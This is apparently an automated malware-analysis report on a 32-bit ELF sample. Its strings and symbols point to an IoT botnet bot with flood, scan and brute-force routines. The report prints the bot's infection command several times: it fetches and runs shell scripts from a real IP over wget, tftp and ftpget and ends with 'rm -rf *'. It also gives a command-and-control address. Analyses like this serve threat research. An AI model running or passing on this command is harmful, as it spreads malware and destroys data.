Report #1587 check_circle

Binary
ABI
ELFOSABI_SYSV
Size
92.73KB
Type
ET_EXEC
trid
50.1% ELF Executable and Linkable format
49.8% ELF Executable and Linkable format
type
ELF
Wordsize
32
Architecture
x86
Hashes
md5
a6b402a0046c6576b9f6256a69173fe1
sha1
3994150b50d6fb9369576cbf30ae7ce50de8df02
crc32
0x47493965
sha224
554158a30699cf4a363b635c8c915f332a2a93707f69b44e364e4404
sha256
4cffb742e51297c5b5d1c6f785c7125bad60259921e60847ec3246cfeb615410
sha384
d4dd30a52e74d7ee82e6544c8cbf936afd9e03db06fdcf884ef76c25f962ad48375c972d2931708c856e2ae47ab058c7
sha512
30074a938996c957778f6082b0cafbdaea5cce983861e4a944f7a7a848806ce71397c982399de544d3b74e3037fda6e555d2df8358b217bc7e20e239e1645a51
ssdeep
1536:jWssyGlQMlPkNVjQWTnT/GzE6pSWGM/tUl8eJD+3DkqsXhQENi786SZhA5Aem77k:0ydMlPkNVjQWTz8ztlUl8eJD+oqihQEC
Community
Google
False cancel
HashLib
False cancel
YARA
Matches
maldoc_getEIP_method_1, domain, url, IP, contentis_base64, is__elf

Suspicious
True check_circle

Dwarf
List

Number
0
Files
Sys

Home

Proc
/proc/cpuinfo, /proc/net/route
Password

Suspicious
True check_circle
Flags
Flags
0
Packer
List
None
Packed
False cancel
Network
IPs
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.47/baws123.sh; chmod 777 baws123.sh; sh baws123.sh; tftp 185.165.29.47 -c get troute1.sh; chmod 777 troute1.sh; sh troute1.sh; tftp -r troute2.sh -g 185.165.29.47; chmod 777 troute2.sh; sh troute2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.165.29.47 troute.sh troute.sh; sh troute.sh; rm -rf baws123.sh troute.sh troute1.sh troute2.sh; rm -rf *, 185.165.29.47:444, Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.11) Gecko/20071128 Camino/1.5.4, Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.6) Gecko/2009020911, Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100628 myibrow/4alpha2, Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285, Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/20090327 Galeon/2.0.7, BlackBerry9700/5.0.0.743 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/100, Mozilla/5.0 (X11; Linux x86_64; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.62, Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36, Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36, Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.39 Safari/525.19, Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; chromeframe/11.0.696.57), Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5, Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11, Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5, Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11, Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
URLs
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.47/baws123.sh; chmod 777 baws123.sh; sh baws123.sh; tftp 185.165.29.47 -c get troute1.sh; chmod 777 troute1.sh; sh troute1.sh; tftp -r troute2.sh -g 185.165.29.47; chmod 777 troute2.sh; sh troute2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.165.29.47 troute.sh troute.sh; sh troute.sh; rm -rf baws123.sh troute.sh troute1.sh troute2.sh; rm -rf *
Mails

Suspicious
True check_circle
Strings
List
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.47/baws123.sh; chmod 777 baws123.sh; sh baws123.sh; tftp 185.165.29.47 -c get troute1.sh; chmod 777 troute1.sh; sh troute1.sh; tftp -r troute2.sh -g 185.165.29.47; chmod 777 troute2.sh; sh troute2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.165.29.47 troute.sh troute.sh; sh troute.sh; rm -rf baws123.sh troute.sh troute1.sh troute2.sh; rm -rf *
185.165.29.47:444
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.39 Safari/525.19
%s %s HTTP/1.1
/etc/config/resolv.conf
.got.plt
/etc/resolv.conf
User-Agent: %s
Network is down
Machine is not on the network
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; chromeframe/11.0.696.57)
No route to host
Host is down
Opera/9.80 (J2ME/MIDP; Opera Mini/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/886; U; en) Presto/2.4.15Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Host: %s
Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; uZardWeb/1.0; Server_JP)
Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285
been_there_done_that.3001
been_there_done_that
_fwrite.c
open.c
write.c
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Transport endpoint is not connected
No such process
Block device required
No such device or address
Remote address changed
Operation now in progress
Too many open files in system
No such device
Object is remote
Link has been severed
Is a named type file
Connection reset by peer
Too many links
Too many open files
.lib section in a.out corrupted
Cannot send after transport endpoint shutdown
Operation not permitted
My IP: %s
8.8.8.8
BUILD %s
BUILD %s
[32mEXECUTED
dnslookup.c
Too many users
__GI_execl
__dns_lookup
__GI_fflush_unlocked
PONG!
/etc/config/hosts
__libc_nanosleep
__GI_sleep
__nameserver
__open_nameservers
__socketcall
__GI_execve
__register_frame_info_bases
/etc/hosts
__GI_pipe
_Jv_RegisterClasses
__deregister_frame_info_bases
gethostbyname.c
socket_connect
gethostbyname_r
opennameservers.c
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
fflush_unlocked.c
__GI_nanosleep
nanosleep.c
read_etc_hosts_r.c
__socketcall.c
fflush_unlocked
Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36
socket.c
__nameservers
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
__read_etc_hosts_r
__open_etc_hosts
__get_hosts_byname_r
__GI_socket
sleep.c
sendHTTP
tcpcsum
killall -9 perl
PONG
HTTP
commServer
pipe.c
Mozilla/5.0 (Android; Linux armv7l; rv:9.0) Gecko/20111216 Firefox/9.0 Fennec/9.0
Software caused connection abort
Socket operation on non-socket
inet_addr

Symbols
List
libc/sysdeps/linux/i386/crti.S, crtstuff.c, __CTOR_LIST__, __DTOR_LIST__, __EH_FRAME_BEGIN__, __JCR_LIST__, completed.2429, p.2427, __do_global_dtors_aux, object.2482, frame_dummy, crtstuff.c, __CTOR_END__, __DTOR_END__, __FRAME_END__, __JCR_END__, __do_global_ctors_aux, initfini.c, libc/sysdeps/linux/i386/crtn.S, libc/sysdeps/linux/i386/crt1.S, razer.c, c, Q, i.4253, printchar, prints, printi, print, fdopen_pids, hextable, ipState, libc/sysdeps/linux/i386/vfork.S, __syscall_fcntl.c, __syscall_fcntl64.c, _exit.c, chdir.c, close.c, dup2.c, fork.c, getdtablesize.c, getpid.c, getrlimit.c, ioctl.c, kill.c, open.c, pipe.c, prctl.c, read.c, select.c, setsid.c, sigprocmask.c, time.c, waitpid.c, write.c, isspace.c, toupper.c, __C_ctype_b.c, __C_ctype_toupper.c, __errno_location.c, printf.c, sprintf.c, vsnprintf.c, _stdio.c, _stdio_streams, __stdio_mutex_initializer.4160, _fixed_buffers, _wcommit.c, vfprintf.c, _vfprintf_internal.c, _charpad, _fp_out_narrow, spec_base.4370, prefix.4371, _ppfs_init.c, _ppfs_prepargs.c, _ppfs_setargs.c, _ppfs_parsespec.c, _promoted_size, type_codes, type_sizes, spec_flags.4372, qual_chars.4377, spec_chars.4373, spec_ranges.4374, spec_or_mask.4375, spec_and_mask.4376, fputs_unlocked.c, fwrite_unlocked.c, memcpy.c, memset.c, strchr.c, strcpy.c, strlen.c, strncpy.c, strnlen.c, strstr.c, __glibc_strerror_r.c, __xpg_strerror_r.c, unknown.1330, _string_syserrmsgs.c, bcopy.c, strtok.c, next_start.1278, isatty.c, tcgetattr.c, ntohl.c, inet_ntoa.c, buf.2827, inet_makeaddr.c, gethostbyname.c, buf.5162, h.5161, gethostbyname_r.c, connect.c, getsockname.c, getsockopt.c, recv.c, send.c, sendto.c, setsockopt.c, socket.c, sigaddset.c, sigempty.c, signal.c, sigsetops.c, malloc.c, __malloc_largebin_index, free.c, __malloc_trim, abort.c, mylock, been_there_done_that, rand.c, random.c, mylock, unsafe_state, randtbl, random_r.c, random_poly_info, system.c, atol.c, strtol.c, _stdlib_strto_l.c, exit.c, execl.c, sleep.c, sysconf.c, __uClibc_main.c, __pthread_return_0, __pthread_return_void, __check_one_fd, been_there_done_that.3001, sigaction.c, __restore_rt, __restore, __syscall_error.c, libc/sysdeps/linux/i386/mmap.S, __socketcall.c, __syscall_rt_sigaction.c, clock_getres.c, execve.c, getegid.c, geteuid.c, getgid.c, getpagesize.c, getuid.c, munmap.c, nanosleep.c, sbrk.c, wait4.c, errno.c, __h_errno_location.c, wcrtomb.c, wcsrtombs.c, wcsnrtombs.c, _WRITE.c, _fwrite.c, _trans2w.c, _load_inttype.c, _store_inttype.c, _uintmaxtostr.c, _fpmaxtostr.c, fmt, exp10_table, memchr.c, memmove.c, mempcpy.c, memrchr.c, strtok_r.c, strpbrk.c, inet_aton.c, dnslookup.c, mylock, static_ns, static_id, opennameservers.c, get_hosts_byname_r.c, raise.c, dl-support.c, brk.c, poll.c, fclose.c, fopen.c, fseeko.c, fseeko64.c, _adjust_pos.c, _fopen.c, _cs_funcs.c, fgets.c, fflush_unlocked.c, fgets_unlocked.c, strcmp.c, strncat.c, rawmemchr.c, strspn.c, strdup.c, ntop.c, inet_pton4, xdigits.3285, inet_ntop4, encodeh.c, decodeh.c, encodeq.c, lengthq.c, decodea.c, read_etc_hosts_r.c, llseek.c, tolower.c, __C_ctype_tolower.c, fgetc_unlocked.c, strcasecmp.c, encoded.c, decoded.c, lengthd.c, _READ.c, _rfill.c, _trans2r.c, __fini_array_end, __fini_array_start, __init_array_end, __preinit_array_end, _GLOBAL_OFFSET_TABLE_, __init_array_start, __preinit_array_start, __read_etc_hosts_r, __GI_execve, __libc_sigaction, strcpy, __GI_fcntl64, recvLine, __GI_sigaddset, __socketcall, __GI___ctype_b, __GI_memchr, __GI___glibc_strerror_r, waitpid, __open_nameservers, __GI_fopen, getrlimit, ioctl, _stdio_openlist_use_count, __GI_initstate_r, __GI_sigaction, strtok_r, __GI___C_ctype_toupper_data, __GI_time, getgid, sysconf, printf, stdout, random, __GI_strdup, __GI_getpagesize, getdtablesize, __GI_h_errno, __length_question, __GI___ctype_toupper, __GI_strcasecmp, __GI_tolower, recv, connect, __encode_question, __GI___uClibc_fini, numpids, __encode_header, __GI_strncat, sigemptyset, __pthread_mutex_lock, initConnection, __sigdelset, __GI_clock_getres, __uClibc_fini, memrchr, geteuid, inet_pton, __GI_vsnprintf, __GI_setsid, memmove, sendTCP, __bsd_signal, __GI_strpbrk, __stdio_trans2r_o, munmap, __GI_setsockopt, __libc_stack_end, __GI_fclose, __GI_wcsnrtombs, __GI_pipe, _uintmaxtostr, __libc_fcntl, atol, _h_errno, getRandomPublicIP, getc_unlocked, __ctype_b, __GI_random_r, usernames, errno, getegid, __GI_sbrk, zprintf, __GI___uClibc_init, execve, getpagesize, getpid, __GI_lseek64, setstate_r, fgets, getHost, __libc_getpid, wildString, __xpg_strerror_r, fcntl64, prctl, memcpy, makeRandomStr, getRandomIP, __GI_fputs_unlocked, execl, __GI_fgets, sendHTTP, creat, _stdio_openlist_dec_use, sclose, __libc_select, _ppfs_init, __GI___C_ctype_toupper, __GI_fgetc_unlocked, __libc_nanosleep, trim, __GI_fgets_unlocked, dup2, __pthread_mutex_init, tolower, getuid, system, __open_etc_hosts, malloc, isatty, sleep, __GI_atol, vsnprintf, __dns_lookup, __GI_read, uastrings, __C_ctype_tolower, random_r, __dso_handle, clock_getres, gethostbyname_r, tcpcsum, fdpclose, socket, __GI_dup2, select, _pthread_cleanup_pop_restore, __GI_wcrtomb, __GI___libc_fcntl, __GI_memset, isspace, __stdio_seek, mempcpy, __GI_strcoll, __GI_write, __ctype_toupper, __libc_read, _string_syserrmsgs, __GI_open, __GI_strchr, __searchdomain, sigaddset, __GI_tcgetattr, __environ, mmap, wcsnrtombs, makeIPPacket, sockprintf, __GI_inet_ntoa, send, __fgetc_unlocked, abort, __GI_fcntl, __GI_wcsrtombs, __GI_fwrite_unlocked, __GI_getgid, srandom_r, _init, __GI_inet_ntoa_r, __GI_setstate_r, parseHex, strtol, pipe, __libc_lseek64, strnlen, rawmemchr, __GI_mempcpy, __malloc_state, __GI___C_ctype_b_data, __sigaddset, nanosleep, __GI_send, h_errno, __pthread_mutex_unlock, wait4, __register_frame_info_bases, __GI_exit, __app_fini, csum, __exit_cleanup, __GI_execl, __GI_srandom_r, __GI___ctype_tolower, write, environ, __GI_close, getBuild, __resolv_lock, kill, fputs_unlocked, __pthread_mutex_trylock, __GI_brk, __GI_nanosleep, __GI_strtok, _stdio_openlist, __GI_sigprocmask, inet_addr, ntohl, __GI_fseek, ourIP, chdir, fseeko, _stdio_openlist_del_count, connectTimeout, __raise, setsockopt, bsd_signal, fseek, __GI_kill, __GI_strcmp, __GI_memmove, sendSTD, setstate, __decode_dotted, __stdio_READ, memchr, __GI_toupper, __pthread_initialize_minimal, __GI_recv, __stdin, stdin, __GI_isatty, _start, __deregister_frame_info_bases, strstr, __GI_ioctl, init_rand, rand, signal, read, __decode_header, getCores, __GI___h_errno_location, __GI_memcpy, strcoll, wcsrtombs, _stdio_user_locking, strncpy, strcasecmp, htonl, sendto, __C_ctype_toupper, StartTheLelz, __GI___C_ctype_b, __GI_gethostbyname_r, __GI_strncpy, __libc_send, __GI___xpg_strerror_r, currentServer, __GI___C_ctype_tolower, __GI_getrlimit, bcopy, __GI_strcpy, __GI_inet_ntop, strtok, __stdio_adjust_position, malloc_trim, __GI_poll, _vfprintf_internal, fork, __stdio_rfill, strncat, gotIP, __GI_sleep, sigaction, __GI_gethostbyname, _dl_phdr, __GI_getc_unlocked, __GI___libc_fcntl64, __uClibc_init, __GI_munmap, _store_inttype, __length_dotted, __getpagesize, __GI_random, __syscall_error, __uclibc_progname, __GI_getegid, __GI_wait4, __malloc_lock, __uClibc_main, sbrk, __rtld_fini, __GI_fork, strdup, __libc_close, __GI_getpid, inet_aton, index, _pthread_cleanup_push_defer, processCmd, __sigismember, fopen, __bss_start, __libc_open, getOurIP, memset, __GI_socket, main, __glibc_strerror_r, listFork, __GI___C_ctype_tolower_data, __stdio_fwrite, negotiate, srand, initstate, fclose, __syscall_rt_sigaction, ntohs, sendUDP, inet_ntoa, tcgetattr, __C_ctype_tolower_data, time, __libc_system, __GI_abort, poll, fdpopen, __get_hosts_byname_r, __stdio_init_mutex, __GI__exit, strcmp, __nameserver, data_start, __GI_sysconf, __h_errno_location, matchPrompt, __C_ctype_b_data, __GI_inet_pton, gethostbyname, _stdio_fopen, _fini, __GI_chdir, __vfork, __GI_mmap, sprintf, fdgets, __get_pc_thunk_bx, strerror_r, __GI_select, __libc_waitpid, socket_connect, __GI_waitpid, _stdio_term, __GI_vfprintf, __decode_answer, __GI_signal, stderr, commServer, vfork, __C_ctype_b, srandom, _ppfs_setargs, __GI_sendto, __GI_sigemptyset, __GI_printf, __libc_fork, __atexit_lock, scanPid, rand_cmwc, __libc_fcntl64, getsockopt, __GI_fseeko64, fflush_unlocked, __stdio_wcommit, __GI___fgetc_unlocked, __nameservers, fwrite_unlocked, inet_ntoa_r, __pagesize, _stdio_openlist_add_lock, __GI_getdtablesize, _edata, __stdout, __GI_memrchr, __GI_fflush_unlocked, __GI_strstr, __searchdomains, _end, htons, _sigintr, _ppfs_prepargs, __GI_strspn, fgetc_unlocked, initstate_r, __GI_connect, __curbrk, __libc_poll, _dl_phnum, _fpmaxtostr, __errno_location, uppercase, _stdlib_strto_l, __GI___libc_open, exit, __stdio_WRITE, _stdio_init, __GI_geteuid, inet_ntop, brk, __C_ctype_toupper_data, _dl_aux_init, sendJUNK, _errno, atoi, _stdio_openlist_del_lock, __GI_inet_aton, fgets_unlocked, _exit, szprintf, strspn, __libc_recv, __libc_creat, strlen, lseek64, open, toupper, __libc_write, __malloc_consolidate, _ppfs_parsespec, __GI_strtol, __GI_getuid, __GI_strtok_r, __GI_errno, __libc_sendto, __stdio_trans2w_o, __GI_vfork, strchr, __GI_rawmemchr, __GI_raise, __data_start, setsid, __GI_inet_addr, __encode_dotted, __GI_strnlen, _Jv_RegisterClasses, infectline, macAddress, __GI___errno_location, readUntil, fcntl, __GI_atoi, fseeko64, __GI_sprintf, __ctype_tolower, wcrtomb, __GI_getsockname, close, __libc_connect, passwords, __GI_strlen, sendHOLD, mainCommSock, pids, sendCNC, vfprintf, strpbrk, getBogos, _load_inttype, raise, free, sigprocmask, getsockname
Number
728
Reason
None
Suspicious
False cancel
Version
Version
EV_CURRENT
Foremost
Matches
None
Suspicious
False cancel
Sections
List
, .init, .text, .fini, .rodata, .eh_frame, .ctors, .dtors, .jcr, .got.plt, .data, .bss, .comment, .shstrtab, .symtab, .strtab
Number
16
Suspicious
False cancel
Segments
Number
3
Suspicious
False cancel
Compilers
List
GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2
Identified
164
Suspicious
True check_circle
Functions
List
, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , libc/sysdeps/linux/i386/crti.S, , crtstuff.c, , __CTOR_LIST__, , __DTOR_LIST__, , __EH_FRAME_BEGIN__, , __JCR_LIST__, , completed.2429, , p.2427, , __do_global_dtors_aux, , object.2482, , frame_dummy, , crtstuff.c, , __CTOR_END__, , __DTOR_END__, , __FRAME_END__, , __JCR_END__, , __do_global_ctors_aux, , initfini.c, , libc/sysdeps/linux/i386/crtn.S, , libc/sysdeps/linux/i386/crt1.S, , razer.c, , c, , Q, , i.4253, , printchar, , prints, , printi, , print, , fdopen_pids, , hextable, , ipState, , libc/sysdeps/linux/i386/vfork.S, , __syscall_fcntl.c, , __syscall_fcntl64.c, , _exit.c, , chdir.c, , close.c, , dup2.c, , fork.c, , getdtablesize.c, , getpid.c, , getrlimit.c, , ioctl.c, , kill.c, , open.c, , pipe.c, , prctl.c, , read.c, , select.c, , setsid.c, , sigprocmask.c, , time.c, , waitpid.c, , write.c, , isspace.c, , toupper.c, , __C_ctype_b.c, , __C_ctype_toupper.c, , __errno_location.c, , printf.c, , sprintf.c, , vsnprintf.c, , _stdio.c, , _stdio_streams, , __stdio_mutex_initializer.4160, , _fixed_buffers, , _wcommit.c, , vfprintf.c, , _vfprintf_internal.c, , _charpad, , _fp_out_narrow, , spec_base.4370, , prefix.4371, , _ppfs_init.c, , _ppfs_prepargs.c, , _ppfs_setargs.c, , _ppfs_parsespec.c, , _promoted_size, , type_codes, , type_sizes, , spec_flags.4372, , qual_chars.4377, , spec_chars.4373, , spec_ranges.4374, , spec_or_mask.4375, , spec_and_mask.4376, , fputs_unlocked.c, , fwrite_unlocked.c, , memcpy.c, , memset.c, , strchr.c, , strcpy.c, , strlen.c, , strncpy.c, , strnlen.c, , strstr.c, , __glibc_strerror_r.c, , __xpg_strerror_r.c, , unknown.1330, , _string_syserrmsgs.c, , bcopy.c, , strtok.c, , next_start.1278, , isatty.c, , tcgetattr.c, , ntohl.c, , inet_ntoa.c, , buf.2827, , inet_makeaddr.c, , gethostbyname.c, , buf.5162, , h.5161, , gethostbyname_r.c, , connect.c, , getsockname.c, , getsockopt.c, , recv.c, , send.c, , sendto.c, , setsockopt.c, , socket.c, , sigaddset.c, , sigempty.c, , signal.c, , sigsetops.c, , malloc.c, , __malloc_largebin_index, , free.c, , __malloc_trim, , abort.c, , mylock, , been_there_done_that, , rand.c, , random.c, , mylock, , unsafe_state, , randtbl, , random_r.c, , random_poly_info, , system.c, , atol.c, , strtol.c, , _stdlib_strto_l.c, , exit.c, , execl.c, , sleep.c, , sysconf.c, , __uClibc_main.c, , __pthread_return_0, , __pthread_return_void, , __check_one_fd, , been_there_done_that.3001, , sigaction.c, , __restore_rt, , __restore, , __syscall_error.c, , libc/sysdeps/linux/i386/mmap.S, , __socketcall.c, , __syscall_rt_sigaction.c, , clock_getres.c, , execve.c, , getegid.c, , geteuid.c, , getgid.c, , getpagesize.c, , getuid.c, , munmap.c, , nanosleep.c, , sbrk.c, , wait4.c, , errno.c, , __h_errno_location.c, , wcrtomb.c, , wcsrtombs.c, , wcsnrtombs.c, , _WRITE.c, , _fwrite.c, , _trans2w.c, , _load_inttype.c, , _store_inttype.c, , _uintmaxtostr.c, , _fpmaxtostr.c, , fmt, , exp10_table, , memchr.c, , memmove.c, , mempcpy.c, , memrchr.c, , strtok_r.c, , strpbrk.c, , inet_aton.c, , dnslookup.c, , mylock, , static_ns, , static_id, , opennameservers.c, , get_hosts_byname_r.c, , raise.c, , dl-support.c, , brk.c, , poll.c, , fclose.c, , fopen.c, , fseeko.c, , fseeko64.c, , _adjust_pos.c, , _fopen.c, , _cs_funcs.c, , fgets.c, , fflush_unlocked.c, , fgets_unlocked.c, , strcmp.c, , strncat.c, , rawmemchr.c, , strspn.c, , strdup.c, , ntop.c, , inet_pton4, , xdigits.3285, , inet_ntop4, , encodeh.c, , decodeh.c, , encodeq.c, , lengthq.c, , decodea.c, , read_etc_hosts_r.c, , llseek.c, , tolower.c, , __C_ctype_tolower.c, , fgetc_unlocked.c, , strcasecmp.c, , encoded.c, , decoded.c, , lengthd.c, , _READ.c, , _rfill.c, , _trans2r.c, , __fini_array_end, , __fini_array_start, , __init_array_end, , __preinit_array_end, , _GLOBAL_OFFSET_TABLE_, , __init_array_start, , __preinit_array_start, , __read_etc_hosts_r, , __GI_execve, , __libc_sigaction, , strcpy, , __GI_fcntl64, , recvLine, , __GI_sigaddset, , __socketcall, , __GI___ctype_b, , __GI_memchr, , __GI___glibc_strerror_r, , waitpid, , __open_nameservers, , __GI_fopen, , getrlimit, , ioctl, , _stdio_openlist_use_count, , __GI_initstate_r, , __GI_sigaction, , strtok_r, , __GI___C_ctype_toupper_data, , __GI_time, , getgid, , sysconf, , printf, , stdout, , random, , __GI_strdup, , __GI_getpagesize, , getdtablesize, , __GI_h_errno, , __length_question, , __GI___ctype_toupper, , __GI_strcasecmp, , __GI_tolower, , recv, , connect, , __encode_question, , __GI___uClibc_fini, , numpids, , __encode_header, , __GI_strncat, , sigemptyset, , __pthread_mutex_lock, , initConnection, , __sigdelset, , __GI_clock_getres, , 